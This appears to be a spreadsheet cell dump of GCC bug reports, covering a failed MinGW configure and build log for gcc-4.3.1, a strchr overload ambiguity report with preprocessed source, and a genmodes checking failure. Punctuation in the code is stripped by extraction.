configure:8796: checking for ar
configure:8829: result: no
configure:8941: checking for ar
configure:8957: found /bin/ar
configure:8967: result: ar
configure:9019: checking for as
configure:9052: result: no
configure:9164: checking for as
configure:9180: found /bin/as
configure:9190: result: as
configure:9242: checking for dlltool
configure:9275: result: no
configure:9387: checking for dlltool
configure:9403: found /bin/dlltool
configure:9413: result: dlltool
configure:9465: checking for ld
configure:9498: result: no
configure:9610: checking for ld
configure:9626: found /bin/ld
configure:9636: result: ld
configure:9688: checking for lipo
configure:9721: result: no
configure:9833: checking for lipo
configure:9862: result: no
configure:9911: checking for nm
configure:9944: result: no
configure:10056: checking for nm
configure:10072: found /bin/nm
configure:10082: result: nm
configure:10134: checking for objdump
configure:10167: result: no
configure:10279: checking for objdump
configure:10295: found /bin/objdump
configure:10305: result: objdump
configure:10357: checking for ranlib
configure:10390: result: no
configure:10502: checking for ranlib
configure:10518: found /bin/ranlib
configure:10528: result: ranlib
configure:10580: checking for strip
configure:10613: result: no
configure:10725: checking for strip
configure:10741: found /bin/strip
configure:10751: result: strip
configure:10803: checking for windres
configure:10836: result: no
configure:10948: checking for windres
configure:10964: found /bin/windres
configure:10974: result: windres
configure:11026: checking for windmc
configure:11059: result: no
configure:11171: checking for windmc
configure:11200: result: no
configure:11227: checking where to find the target ar
configure:11260: result: host tool
configure:11269: checking where to find the target as
configure:11302: result: host tool
configure:11311: checking where to find the target cc
configure:11334: result: just compiled
configure:11353: checking where to find the target c++
configure:11379: result: just compiled
configure:11398: checking where to find the target c++ for libstdc++
configure:11424: result: just compiled
configure:11443: checking where to find the target dlltool
configure:11476: result: host tool
configure:11485: checking where to find the target gcc
configure:11508: result: just compiled
configure:11527: checking where to find the target gcj
configure:11563: result: host tool
configure:11572: checking where to find the target gfortran
configure:11608: result: host tool
configure:11617: checking where to find the target ld
configure:11650: result: host tool
configure:11659: checking where to find the target lipo
configure:11681: result: host tool
configure:11690: checking where to find the target nm
configure:11723: result: host tool
configure:11732: checking where to find the target objdump
configure:11765: result: host tool
configure:11774: checking where to find the target ranlib
configure:11807: result: host tool
configure:11816: checking where to find the target strip
configure:11849: result: host tool
configure:11858: checking where to find the target windres
configure:11891: result: host tool
configure:11900: checking where to find the target windmc
configure:11933: result: host tool
configure:11970: checking whether to enable maintainer-specific portions of Makefiles
configure:11979: result: no
configure:12012: checking whether -fkeep-inline-functions is supported
configure:12034: gcc -c -g -O2 -fkeep-inline-functions  conftest.c &gt;&amp;5
configure:12040: $? = 0
configure:12044: test -z 
			 || test ! -s conftest.err
configure:12047: $? = 0
configure:12050: test -s conftest.o
configure:12053: $? = 0
configure:12055: result: yes
configure:12272: creating ./config.status
## ---------------------- ##
## Running config.status. ##
## ---------------------- ##
This file was extended by config.status which was
generated by GNU Autoconf 2.59.  Invocation command line was
  CONFIG_FILES    = 
  CONFIG_HEADERS  = 
  CONFIG_LINKS    = 
  CONFIG_COMMANDS = 
  $ ./config.status 
on ANDRY_HOST
config.status:762: creating Makefile
## ---------------- ##
## Cache variables. ##
## ---------------- ##
ac_cv_build=i686-pc-mingw32
ac_cv_build_alias=i686-pc-mingw32
ac_cv_c_compiler_gnu=yes
ac_cv_cxx_compiler_gnu=yes
ac_cv_env_AR_FOR_TARGET_set=
ac_cv_env_AR_FOR_TARGET_value=
ac_cv_env_AR_set=
ac_cv_env_AR_value=
ac_cv_env_AS_FOR_TARGET_set=
ac_cv_env_AS_FOR_TARGET_value=
ac_cv_env_AS_set=
ac_cv_env_AS_value=
ac_cv_env_CC_FOR_TARGET_set=
ac_cv_env_CC_FOR_TARGET_value=
ac_cv_env_CC_set=
ac_cv_env_CC_value=
ac_cv_env_CFLAGS_set=
ac_cv_env_CFLAGS_value=
ac_cv_env_CPPFLAGS_set=
ac_cv_env_CPPFLAGS_value=
ac_cv_env_CXXFLAGS_set=
ac_cv_env_CXXFLAGS_value=
ac_cv_env_CXX_FOR_TARGET_set=
ac_cv_env_CXX_FOR_TARGET_value=
ac_cv_env_CXX_set=
ac_cv_env_CXX_value=
ac_cv_env_DLLTOOL_FOR_TARGET_set=
ac_cv_env_DLLTOOL_FOR_TARGET_value=
ac_cv_env_DLLTOOL_set=
ac_cv_env_DLLTOOL_value=
ac_cv_env_GCC_FOR_TARGET_set=
ac_cv_env_GCC_FOR_TARGET_value=
ac_cv_env_GCJ_FOR_TARGET_set=
ac_cv_env_GCJ_FOR_TARGET_value=
ac_cv_env_GFORTRAN_FOR_TARGET_set=
ac_cv_env_GFORTRAN_FOR_TARGET_value=
ac_cv_env_LDFLAGS_set=
ac_cv_env_LDFLAGS_value=
ac_cv_env_LD_FOR_TARGET_set=
ac_cv_env_LD_FOR_TARGET_value=
ac_cv_env_LD_set=
ac_cv_env_LD_value=
ac_cv_env_LIPO_FOR_TARGET_set=
ac_cv_env_LIPO_FOR_TARGET_value=
ac_cv_env_LIPO_set=
ac_cv_env_LIPO_value=
ac_cv_env_NM_FOR_TARGET_set=
ac_cv_env_NM_FOR_TARGET_value=
ac_cv_env_NM_set=
ac_cv_env_NM_value=
ac_cv_env_OBJCOPY_set=
ac_cv_env_OBJCOPY_value=
ac_cv_env_OBJDUMP_FOR_TARGET_set=
ac_cv_env_OBJDUMP_FOR_TARGET_value=
ac_cv_env_OBJDUMP_set=
ac_cv_env_OBJDUMP_value=
ac_cv_env_RANLIB_FOR_TARGET_set=
ac_cv_env_RANLIB_FOR_TARGET_value=
ac_cv_env_RANLIB_set=
ac_cv_env_RANLIB_value=
ac_cv_env_STRIP_FOR_TARGET_set=
ac_cv_env_STRIP_FOR_TARGET_value=
ac_cv_env_STRIP_set=
ac_cv_env_STRIP_value=
ac_cv_env_WINDMC_FOR_TARGET_set=
ac_cv_env_WINDMC_FOR_TARGET_value=
ac_cv_env_WINDMC_set=
ac_cv_env_WINDMC_value=
ac_cv_env_WINDRES_FOR_TARGET_set=
ac_cv_env_WINDRES_FOR_TARGET_value=
ac_cv_env_WINDRES_set=
ac_cv_env_WINDRES_value=
ac_cv_env_build_alias_set=
ac_cv_env_build_alias_value=
ac_cv_env_host_alias_set=
ac_cv_env_host_alias_value=
ac_cv_env_target_alias_set=
ac_cv_env_target_alias_value=
ac_cv_exeext=.exe
ac_cv_host=i686-pc-mingw32
ac_cv_host_alias=i686-pc-mingw32
ac_cv_objext=o
ac_cv_path_install='/bin/install -c'
ac_cv_prog_AR=ar
ac_cv_prog_AR_FOR_TARGET=ar
ac_cv_prog_AS=as
ac_cv_prog_AS_FOR_TARGET=as
ac_cv_prog_BISON=bison
ac_cv_prog_CC_FOR_TARGET=gcc
ac_cv_prog_CXX_FOR_TARGET=c++
ac_cv_prog_DLLTOOL=dlltool
ac_cv_prog_DLLTOOL_FOR_TARGET=dlltool
ac_cv_prog_FLEX=flex
ac_cv_prog_GCC_FOR_TARGET=gcc
ac_cv_prog_LD=C:/mingw/bin/../lib/gcc/mingw32/3.4.5/../../../../mingw32/bin/ld.exe
ac_cv_prog_LD_FOR_TARGET=ld
ac_cv_prog_LEX=flex
ac_cv_prog_M4=m4
ac_cv_prog_MAKEINFO=makeinfo
ac_cv_prog_NM=nm
ac_cv_prog_NM_FOR_TARGET=nm
ac_cv_prog_OBJCOPY=objcopy
ac_cv_prog_OBJDUMP=objdump
ac_cv_prog_OBJDUMP_FOR_TARGET=objdump
ac_cv_prog_RANLIB=ranlib
ac_cv_prog_RANLIB_FOR_TARGET=ranlib
ac_cv_prog_STRIP=strip
ac_cv_prog_STRIP_FOR_TARGET=strip
ac_cv_prog_WINDRES=windres
ac_cv_prog_WINDRES_FOR_TARGET=windres
ac_cv_prog_YACC='bison -y'
ac_cv_prog_ac_ct_CC=gcc
ac_cv_prog_ac_ct_CXX=g++
ac_cv_prog_ac_ct_GNATBIND=no
ac_cv_prog_ac_ct_GNATMAKE=no
ac_cv_prog_cc_g=yes
ac_cv_prog_cc_stdc=
ac_cv_prog_cxx_g=yes
ac_cv_target=i686-pc-mingw32
ac_cv_target_alias=i686-pc-mingw32
acx_cv_cc_gcc_supports_ada=no
acx_cv_prog_LN=ln
gcc_cv_prog_cmp_skip='cmp --ignore-initial=16 $$f1 $$f2'
gcc_cv_tool_dirs=/usr/local/libexec/gcc/i686-pc-mingw32/4.3.1:/usr/local/libexec/gcc/i686-pc-mingw32:/usr/lib/gcc/i686-pc-mingw32/4.3.1:/usr/lib/gcc/i686-pc-mingw32:/usr/local/i686-pc-mingw32/bin/i686-pc-mingw32/4.3.1:/usr/local/i686-pc-mingw32/bin:
gcc_cv_tool_prefix=/usr/local
## ----------------- ##
## Output variables. ##
## ----------------- ##
AR='ar'
AR_FOR_BUILD='$(AR)'
AR_FOR_TARGET='$(AR)'
AS='as'
AS_FOR_BUILD='$(AS)'
AS_FOR_TARGET='$(AS)'
BISON='bison'
CC='gcc'
CC_FOR_BUILD='$(CC)'
CC_FOR_TARGET='$$r/$(HOST_SUBDIR)/gcc/xgcc -B$$r/$(HOST_SUBDIR)/gcc/'
CFLAGS='-g -O2'
CFLAGS_FOR_BUILD='-g -O2'
COMPILER_AS_FOR_TARGET='$$r/$(HOST_SUBDIR)/gcc/as'
COMPILER_LD_FOR_TARGET='$$r/$(HOST_SUBDIR)/gcc/collect-ld'
COMPILER_NM_FOR_TARGET='$$r/$(HOST_SUBDIR)/gcc/nm'
CONFIGURE_GDB_TK=''
CPPFLAGS=''
CXX='g++'
CXXFLAGS='-g -O2'
CXXFLAGS_FOR_BUILD='-g -O2'
CXX_FOR_BUILD='$(CXX)'
CXX_FOR_TARGET='$$r/$(HOST_SUBDIR)/gcc/g++ -B$$r/$(HOST_SUBDIR)/gcc/ -nostdinc++ `test ! -f $$r/$(TARGET_SUBDIR)/libstdc++-v3/scripts/testsuite_flags || $(SHELL) $$r/$(TARGET_SUBDIR)/libstdc++-v3/scripts/testsuite_flags --build-includes` -L$$r/$(TARGET_SUBDIR)/libstdc++-v3/src -L$$r/$(TARGET_SUBDIR)/libstdc++-v3/src/.libs'
DEBUG_PREFIX_CFLAGS_FOR_TARGET=''
DEFS='-DPACKAGE_NAME=\\ -DPACKAGE_TARNAME=\\ -DPACKAGE_VERSION=\\ -DPACKAGE_STRING=\\ -DPACKAGE_BUGREPORT=\\ '
DLLTOOL='dlltool'
DLLTOOL_FOR_BUILD='$(DLLTOOL)'
DLLTOOL_FOR_TARGET='$(DLLTOOL)'
ECHO_C=''
ECHO_N='-n'
ECHO_T=''
EXEEXT='.exe'
EXPECT='expect'
FLAGS_FOR_TARGET=' -L$$r/$(TARGET_SUBDIR)/winsup/mingw -L$$r/$(TARGET_SUBDIR)/winsup/w32api/lib -isystem $$s/winsup/mingw/include -isystem $$s/winsup/w32api/include -B$(build_tooldir)/bin/ -B$(build_tooldir)/lib/ -isystem $(build_tooldir)/include -isystem $(build_tooldir)/sys-include'
FLEX='flex'
GCC_FOR_TARGET='$$r/$(HOST_SUBDIR)/gcc/xgcc -B$$r/$(HOST_SUBDIR)/gcc/'
GCJ_FOR_BUILD='$(GCJ)'
GCJ_FOR_TARGET='$(GCJ)'
GDB_TK=''
GFORTRAN_FOR_BUILD='$(GFORTRAN)'
GFORTRAN_FOR_TARGET='$(GFORTRAN)'
GNATBIND='no'
GNATMAKE='no'
INSTALL_DATA='${INSTALL} -m 644'
INSTALL_GDB_TK=''
INSTALL_PROGRAM='${INSTALL}'
INSTALL_SCRIPT='${INSTALL}'
LD='C:/mingw/bin/../lib/gcc/mingw32/3.4.5/../../../../mingw32/bin/ld.exe'
LDFLAGS=''
LDFLAGS_FOR_BUILD=''
LD_FOR_BUILD='$(LD)'
LD_FOR_TARGET='$(LD)'
LEX='flex'
LIBOBJS=''
LIBS=''
LIPO='lipo'
LIPO_FOR_TARGET='$(LIPO)'
LN='ln'
LN_S='ln -s'
LTLIBOBJS=''
M4='m4'
MAINT='#'
MAINTAINER_MODE_FALSE=''
MAINTAINER_MODE_TRUE='#'
MAKEINFO='/f/_Builds/gcc-4.3.1/missing makeinfo'
NM='nm'
NM_FOR_BUILD='$(NM)'
NM_FOR_TARGET='$(NM)'
OBJCOPY='objcopy'
OBJDUMP='objdump'
OBJDUMP_FOR_TARGET='$(OBJDUMP)'
OBJEXT='o'
PACKAGE_BUGREPORT=''
PACKAGE_NAME=''
PACKAGE_STRING=''
PACKAGE_TARNAME=''
PACKAGE_VERSION=''
PATH_SEPARATOR=':'
RANLIB='ranlib'
RANLIB_FOR_BUILD='$(RANLIB)'
RANLIB_FOR_TARGET='$(RANLIB)'
RAW_CXX_FOR_TARGET='$$r/$(HOST_SUBDIR)/gcc/xgcc -shared-libgcc -B$$r/$(HOST_SUBDIR)/gcc -nostdinc++ -L$$r/$(TARGET_SUBDIR)/libstdc++-v3/src -L$$r/$(TARGET_SUBDIR)/libstdc++-v3/src/.libs'
RPATH_ENVVAR='LD_LIBRARY_PATH'
RUNTEST='runtest'
SHELL='/bin/sh'
STRIP='strip'
STRIP_FOR_TARGET='$(STRIP)'
SYSROOT_CFLAGS_FOR_TARGET=''
TOPLEVEL_CONFIGURE_ARGUMENTS='../gcc-4.3.1/configure --enable-languages=cobjcc++'
WINDMC='windmc'
WINDMC_FOR_BUILD='$(WINDMC)'
WINDMC_FOR_TARGET='$(WINDMC)'
WINDRES='windres'
WINDRES_FOR_BUILD='$(WINDRES)'
WINDRES_FOR_TARGET='$(WINDRES)'
YACC='bison -y'
ac_ct_CC='gcc'
ac_ct_CXX='g++'
ac_ct_GNATBIND='no'
ac_ct_GNATMAKE='no'
bindir='${exec_prefix}/bin'
build='i686-pc-mingw32'
build_alias=''
build_configargs='--cache-file=../config.cache '--enable-languages=cc++objc' --program-transform-name='syy''
build_configdirs=' libiberty fixincludes'
build_cpu='i686'
build_libsubdir='build-i686-pc-mingw32'
build_noncanonical='i686-pc-mingw32'
build_os='mingw32'
build_subdir='build-i686-pc-mingw32'
build_tooldir='${exec_prefix}/i686-pc-mingw32'
build_vendor='pc'
config_shell='/bin/sh'
configdirs=' intl libiberty libcpp libdecnumber fixincludes gcc'
datadir='${prefix}/share'
datarootdir='${prefix}/share'
do_compare='cmp --ignore-initial=16 $$f1 $$f2'
docdir='${datarootdir}/doc'
exec_prefix='${prefix}'
gmpinc=''
gmplibs='-lmpfr -lgmp'
host='i686-pc-mingw32'
host_alias=''
host_configargs='--cache-file=./config.cache  '--enable-languages=cc++objc' --program-transform-name='syy''
host_cpu='i686'
host_noncanonical='i686-pc-mingw32'
host_os='mingw32'
host_subdir='.'
host_vendor='pc'
htmldir='${docdir}'
includedir='${prefix}/include'
infodir='${prefix}/info'
libdir='${exec_prefix}/lib'
libexecdir='${exec_prefix}/libexec'
localstatedir='${prefix}/var'
mandir='${prefix}/man'
oldincludedir='/usr/include'
pdfdir='${docdir}'
prefix='/usr/local'
program_transform_name='syy'
sbindir='${exec_prefix}/sbin'
sharedstatedir='${prefix}/com'
stage1_cflags='-g -fkeep-inline-functions'
stage1_checking='--enable-checking=yestypes'
stage1_languages='c'
stage2_werror_flag=''
sysconfdir='${prefix}/etc'
target='i686-pc-mingw32'
target_alias=''
target_configargs='--cache-file=./config.cache --enable-multilib '--enable-languages=cc++objc' --program-transform-name='syy''
target_cpu='i686'
target_noncanonical='i686-pc-mingw32'
target_os='mingw32'
target_subdir='i686-pc-mingw32'
target_vendor='pc'
tooldir='${exec_prefix}/i686-pc-mingw32'
## ------------- ##
## Output files. ##
## ------------- ##
alphaieee_frag='/dev/null'
host_makefile_frag='../gcc-4.3.1/config/mh-mingw'
ospace_frag='/dev/null'
serialization_dependencies='serdep.tmp'
target_makefile_frag='/dev/null'
## ----------- ##
## confdefs.h. ##
## ----------- ##
#define PACKAGE_BUGREPORT 
#define PACKAGE_NAME 
#define PACKAGE_STRING 
#define PACKAGE_TARNAME 
#define PACKAGE_VERSION 
#endif
#ifdef __cplusplus
extern C void std::exit (int) throw () using std::exit
configure: exit 0 
----
Make failed with error:
----
The directory that should contain system headers does not exist:
  /mingw/include
make[3]: *** [stmp-fixinc] Error 1
make[3]: Leaving directory `/f/_Builds/gcc-4.3.1-build/gcc'
make[2]: *** [all-stage1-gcc] Error 2
make[2]: Leaving directory `/f/_Builds/gcc-4.3.1-build'
make[1]: *** [stage1-bubble] Error 2
make[1]: Leaving directory `/f/_Builds/gcc-4.3.1-build'
make: *** [all] Error 2
----</t>
  </si>
  <si>
    <t>andry</t>
  </si>
  <si>
    <t>GCC-2767</t>
  </si>
  <si>
    <t>Problems with the new bits/std_cstring.h header</t>
  </si>
  <si>
    <t>After the lines  
  extern C const char* strchr(const char* int) 
  inline char*
  strchr(char* __s1 int __n)
  {
    return const_cast(strchr(const_cast(__s1) __n))
  }
have been added to bits/std_cstring.h the following source code td.C does
no longer compile. The same holds true mutatis mutandis for strstr strrchr
strpbrk and  memchr. If I explicitly qualify strchr with the prefix
std:: or :: the code does compile. Though this behaviour may be legal
it breaks a lot of code. Therefore I kindly ask you to the fix the problem.
I destilled the code td.C from a large ~1 Mbyte
compilation unit from root which does compile with gcc 3.0.
Release:
3.1 20010428 (experimental)
Environment:
System: Linux kiste 2.4.3 #35 Sat Mar 31 22:08:25 CEST 2001 i686 unknown
Architecture: i686
SuSE 7.1
Glibc 2.2
GNU ld version 2.11.90.0.4 (with BFD 2.11.90.0.4)
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long --enable-languages=cc++f77objc
How-To-Repeat:
Source file td.C
#include //or #include or #include  
using namespace std
void f(const char *name)
{
    strchr(name'/')
}
Compiling td.C
g++ -v -c td.C -W -Wall -save-temps 
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long --enable-languages=cc++f77objc
Thread model: posix
gcc version 3.1 20010428 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cpp0 -lang-c++ -D_GNU_SOURCE -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -W -Wall -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ td.C td.ii
GNU CPP version 3.1 20010428 (experimental) (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include/g++-v3/backward
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cc1plus -fpreprocessed td.ii -quiet -dumpbase td.C -W -Wall -version -o td.s
GNU CPP version 3.1 20010428 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.1 20010428 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.1 20010428 (experimental).
td.C: In function `void f(const char*)':
td.C:6: call of overloaded `strchr(const char*&amp; char)' is ambiguous
/usr/include/string.h:155: candidates are: char* strchr(const char* int)
/usr/local/include/g++-v3/bits/std_cstring.h:91:                 char* 
   std::strchr(char* int) 
/usr/local/include/g++-v3/bits/std_cstring.h:88:                 const char* 
   std::strchr(const char* int)
Preprocessed source file td.ii
# 1 td.C
# 1 /usr/local/include/g++-v3/cstring 1 3
# 1 /usr/local/include/g++-v3/bits/std_cstring.h 1 3
# 39 /usr/local/include/g++-v3/bits/std_cstring.h 3
# 1 /usr/local/include/g++-v3/i686-pc-linux-gnu/bits/c++config.h 1 3
# 34 /usr/local/include/g++-v3/i686-pc-linux-gnu/bits/c++config.h 3
# 1 /usr/local/include/g++-v3/i686-pc-linux-gnu/bits/os_defines.h 1 3
# 37 /usr/local/include/g++-v3/i686-pc-linux-gnu/bits/os_defines.h 3
# 1 /usr/include/features.h 1 3
# 283 /usr/include/features.h 3
# 1 /usr/include/sys/cdefs.h 1 3
# 284 /usr/include/features.h 2 3
# 311 /usr/include/features.h 3
# 1 /usr/include/gnu/stubs.h 1 3
# 312 /usr/include/features.h 2 3
# 38 /usr/local/include/g++-v3/i686-pc-linux-gnu/bits/os_defines.h 2 3
# 35 /usr/local/include/g++-v3/i686-pc-linux-gnu/bits/c++config.h 2 3
# 40 /usr/local/include/g++-v3/bits/std_cstring.h 2 3
# 1 /usr/local/include/g++-v3/bits/std_cstddef.h 1 3
# 40 /usr/local/include/g++-v3/bits/std_cstddef.h 3
# 1 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include/stddef.h 1 3
# 147 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include/stddef.h 3
typedef int ptrdiff_t
# 199 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include/stddef.h 3
typedef unsigned int size_t
# 41 /usr/local/include/g++-v3/bits/std_cstddef.h 2 3
namespace std
{
  using ::ptrdiff_t
  using ::size_t
}
# 41 /usr/local/include/g++-v3/bits/std_cstring.h 2 3
# 43 /usr/local/include/g++-v3/bits/std_cstring.h 3
# 1 /usr/include/string.h 1 3
# 26 /usr/include/string.h 3
# 1 /usr/include/features.h 1 3
# 27 /usr/include/string.h 2 3
extern C {
# 1 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include/stddef.h 1 3
# 34 /usr/include/string.h 2 3
extern void *memcpy (void *__restrict __dest
                     __const void *__restrict __src size_t __n) throw ()
extern void *memmove (void *__dest __const void *__src size_t __n)
     throw ()
extern void *memccpy (void *__restrict __dest __const void *__restrict __src
                      int __c size_t __n)
     throw ()
extern void *memset (void *__s int __c size_t __n) throw ()
extern int memcmp (__const void *__s1 __const void *__s2 size_t __n)
     throw () __attribute__ ((__pure__))
extern void *memchr (__const void *__s int __c size_t __n)
      throw () __attribute__ ((__pure__))
extern void *rawmemchr (__const void *__s int __c) throw () __attribute__ ((__pure__))
extern void *memrchr (__const void *__s int __c size_t __n)
      throw () __attribute__ ((__pure__))
extern char *strcpy (char *__restrict __dest __const char *__restrict __src)
     throw ()
extern char *strncpy (char *__restrict __dest
                      __const char *__restrict __src size_t __n) throw ()
extern char *strcat (char *__restrict __dest __const char *__restrict __src)
     throw ()
extern char *strncat (char *__restrict __dest __const char *__restrict __src
                      size_t __n) throw ()
extern int strcmp (__const char *__s1 __const char *__s2)
     throw () __attribute__ ((__pure__))
extern int strncmp (__const char *__s1 __const char *__s2 size_t __n)
     throw () __attribute__ ((__pure__))
extern int strcoll (__const char *__s1 __const char *__s2)
     throw () __attribute__ ((__pure__))
extern size_t strxfrm (char *__restrict __dest
                       __const char *__restrict __src size_t __n) throw ()
# 1 /usr/include/xlocale.h 1 3
# 28 /usr/include/xlocale.h 3
typedef struct __locale_struct
{
  struct locale_data *__locales[13]
  const unsigned short int *__ctype_b
  const int *__ctype_tolower
  const int *__ctype_toupper
} *__locale_t
# 109 /usr/include/string.h 2 3
extern int __strcoll_l (__const char *__s1 __const char *__s2 __locale_t __l)
     throw () __attribute__ ((__pure__))
extern size_t __strxfrm_l (char *__dest __const char *__src size_t __n
                           __locale_t __l) throw ()
extern char *strdup (__const char *__s) throw () __attribute__ ((__malloc__))
extern char *strndup (__const char *__string size_t __n)
     throw () __attribute__ ((__malloc__))
# 155 /usr/include/string.h 3
extern char *strchr (__const char *__s int __c) throw () __attribute__ ((__pure__))
extern char *strrchr (__const char *__s int __c) throw () __attribute__ ((__pure__))
extern char *strchrnul (__const char *__s int __c) throw () __attribute__ ((__pure__))
extern size_t strcspn (__const char *__s __const char *__reject)
     throw () __attribute__ ((__pure__))
extern size_t strspn (__const char *__s __const char *__accept)
     throw () __attribute__ ((__pure__))
extern char *strpbrk (__const char *__s __const char *__accept)
     throw () __attribute__ ((__pure__))
extern char *strstr (__const char *__haystack __const char *__needle)
     throw () __attribute__ ((__pure__))
extern char *strcasestr (__const char *__haystack __const char *__needle)
     throw () __attribute__ ((__pure__))
extern char *strtok (char *__restrict __s __const char *__restrict __delim)
     throw ()
extern char *__strtok_r (char *__restrict __s
                         __const char *__restrict __delim
                         char **__restrict __save_ptr) throw ()
extern char *strtok_r (char *__restrict __s __const char *__restrict __delim
                       char **__restrict __save_ptr) throw ()
extern void *memmem (__const void *__haystack size_t __haystacklen
                     __const void *__needle size_t __needlelen)
     throw () __attribute__ ((__pure__))
extern void *__mempcpy (void *__restrict __dest
                        __const void *__restrict __src size_t __n) throw ()
extern void *mempcpy (void *__restrict __dest
                      __const void *__restrict __src size_t __n) throw ()
extern size_t strlen (__const char *__s) throw () __attribute__ ((__pure__))
extern size_t strnlen (__const char *__string size_t __maxlen)
     throw () __attribute__ ((__pure__))
extern char *strerror (int __errnum) throw ()
extern char *__strerror_r (int __errnum char *__buf size_t __buflen) throw ()
extern char *strerror_r (int __errnum char *__buf size_t __buflen) throw ()
extern void __bzero (void *__s size_t __n) throw ()
extern void bcopy (__const void *__src void *__dest size_t __n) throw ()
extern void bzero (void *__s size_t __n) throw ()
extern int bcmp (__const void *__s1 __const void *__s2 size_t __n)
     throw () __attribute__ ((__pure__))
extern char *index (__const char *__s int __c) throw () __attribute__ ((__pure__))
extern char *rindex (__const char *__s int __c) throw () __attribute__ ((__pure__))
extern int __ffs (int __i) throw () __attribute__ ((const))
extern int ffs (int __i) throw () __attribute__ ((const))
extern int ffsl (long int __l) throw () __attribute__ ((const))
__extension__ extern int ffsll (long long int __ll)
     throw () __attribute__ ((const))
extern int strcasecmp (__const char *__s1 __const char *__s2)
     throw () __attribute__ ((__pure__))
extern int strncasecmp (__const char *__s1 __const char *__s2 size_t __n)
     throw () __attribute__ ((__pure__))
extern int __strcasecmp_l (__const char *__s1 __const char *__s2
                           __locale_t __loc) throw () __attribute__ ((__pure__))
extern int __strncasecmp_l (__const char *__s1 __const char *__s2
                            size_t __n __locale_t __loc)
     throw () __attribute__ ((__pure__))
extern char *strsep (char **__restrict __stringp
                     __const char *__restrict __delim) throw ()
extern int strverscmp (__const char *__s1 __const char *__s2)
     throw () __attribute__ ((__pure__))
extern char *strsignal (int __sig) throw ()
extern char *__stpcpy (char *__restrict __dest __const char *__restrict __src)
     throw ()
extern char *stpcpy (char *__restrict __dest __const char *__restrict __src)
     throw ()
extern char *__stpncpy (char *__restrict __dest
                        __const char *__restrict __src size_t __n) throw ()
extern char *stpncpy (char *__restrict __dest
                      __const char *__restrict __src size_t __n) throw ()
extern char *strfry (char *__string) throw ()
extern void *memfrob (void *__s size_t __n) throw ()
extern char *basename (__const char *__filename) throw ()
# 365 /usr/include/string.h 3
}
# 44 /usr/local/include/g++-v3/bits/std_cstring.h 2 3
# 69 /usr/local/include/g++-v3/bits/std_cstring.h 3
namespace std
{
  extern C void* memcpy(void* const void* size_t)
  extern C void* memmove(void* const void* size_t)
  extern C char* strcpy(char* const char*)
  extern C char* strncpy(char* const char* size_t)
  extern C char* strcat(char* const char*)
  extern C char* strncat(char* const char* size_t)
  extern C int memcmp(const void* const void* size_t)
  extern C int strcmp(const char* const char*)
  extern C int strcoll(const char* const char*)
  extern C int strncmp(const char* const char* size_t)
  extern C size_t strxfrm(char* const char* size_t)
  extern C const void* memchr(const void* int size_t)
  inline void*
  memchr(void* __p int __c size_t __n)
  {
    return const_cast(memchr(const_cast(__p) __c __n))
  }
  extern C const char* strchr(const char* int)
  inline char*
  strchr(char* __s1 int __n)
  {
    return const_cast(strchr(const_cast(__s1) __n))
  }
  extern C size_t strcspn(const char* const char*)
  extern C const char* strpbrk(const char* const char*)
  inline char*
  strpbrk(char* __s1 const char* __s2)
  {
    return const_cast(strpbrk(const_cast(__s1) __s2))
  }
  extern C const char* strrchr(const char* int)
  inline char*
  strrchr(char* __s1 int __n)
  {
    return const_cast(strrchr(const_cast(__s1) __n))
  }
  extern C size_t strspn(const char* const char*)
  extern C const char* strstr(const char* const char*)
  inline char*
  strstr(char* __s1 const char* __s2)
  {
    return const_cast(strstr(const_cast(__s1) __s2))
  }
  extern C char* strtok(char* const char*)
  extern C void* memset(void* int size_t)
  extern C char* strerror(int)
  extern C size_t strlen(const char*)
}
# 3 /usr/local/include/g++-v3/cstring 2 3
# 2 td.C 2
using namespace std
void f(const char *name)
{
    strchr(name'/')
}</t>
  </si>
  <si>
    <t>GCC-61757</t>
  </si>
  <si>
    <t>[4.10 Regression] genmodes failure with enable-checking</t>
  </si>
  <si>
    <t>I just tried a bootstrap of revision 212385 with extra
flag --enable-checking=yes and got
echo timestamp &gt; s-genrtl-h
build/genmodes -m &gt; tmp-min-modes.c
build/genmodes: config/i386/i386-modes.def:25: (TF) field format must not be set
build/genmodes: config/i386/i386-modes.def:24: (XF) field format must not be set
build/genmodes: machmode.def:203: (DF) field format must not be set
build/genmodes: machmode.def:202: (SF) field format must not be set
build/genmodes: machmode.def:244: (TD) field format must not be set
build/genmodes: machmode.def:243: (DD) field format must not be set
build/genmodes: machmode.def:242: (SD) field format must not be set
make[3]: *** [s-modes-m] Error 1
Configure line is
../src/trunk/configure --prefix=/home/dcb/gcc/results --enable-checking=yes --enable-languages=cc++fortran --disable-werror CC=clang -g -O2 -Wall -fheinous-gnu-extensions CXX=clang++ -g -O2 -Wall -fheinous-gnu-extensions
Bootstrap line is
(date time make BOOT_CFLAGS='-g -O3' CFLAGS_FOR_TARGET='-g -O3' -j 5 bootstrap date) &gt; mk.out 2&gt;&amp;1 &amp;</t>
  </si>
  <si>
    <t>GCC-60940</t>
  </si>
  <si>
